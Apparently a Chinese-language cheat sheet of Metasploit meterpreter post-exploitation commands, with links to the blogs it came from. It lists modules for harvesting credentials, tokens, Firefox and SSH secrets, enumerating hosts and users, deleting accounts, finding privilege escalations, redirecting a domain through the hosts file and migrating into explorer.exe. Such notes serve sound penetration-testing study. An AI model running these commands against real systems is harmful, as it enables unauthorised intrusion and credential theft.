屏幕截图 2022-05-29 165126.png
详情:https://www.jianshu.com/p/3623b878daf9
https://blog.csdn.net/f_carey/article/details/120101365

POST 模块

  1. meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24 #arp扫描
  2. meterpreter > run post/windows/gather/checkvm #确认是否虚拟机
  3. meterpreter > run post/windows/gather/credentials/credential_collector #账号与token
  4. meterpreter > run post/windows/gather/enum_applications #应用程序详情,会保存到一个文本里
  5. meterpreter > run post/windows/gather/enum_logged_on_users #当前登录的用户
  6. meterpreter > run post/windows/gather/enum_snmp #snmp
  7. meterpreter > run post/windows/manage/delete_user USERNAME=test #删除用户,重启生效
  8. meterpreter > run post/multi/recon/local_exploit_suggester #所有可以提权的漏洞
  9. meterpreter > run post/multi/gather/env #大量信息
  10. meterpreter > run post/multi/gather/firefox_creds #通过firefox进行控制
  11. meterpreter > run post/multi/gather/ssh_creds #本地ssh信息
  12. meterpreter > run post/multi/gather/check_malware REMOTEFILE=c:\a.exe #检查文件是不是恶意软件
  13. meterpreter > run hostsedit -e 1.1.1.1,www.baidu.com #修改host,将baidu解析到1.1.1.1
  14. msf > use exploit/multi/handler
  15. msf exploit(handler) > set AutoRunScript hostsedit -e 1.1.1.1,www.baidu.com #自动执行 metepreter 脚本
  16. meterpreter > migrate -N explorer.exe
  17. msf exploit(handler) > set InitialAutoRunScript migrate -n explorer.exe #自动执行 post 模块
  18. 原文:https://fishpond.blog.csdn.net/article/details/105860273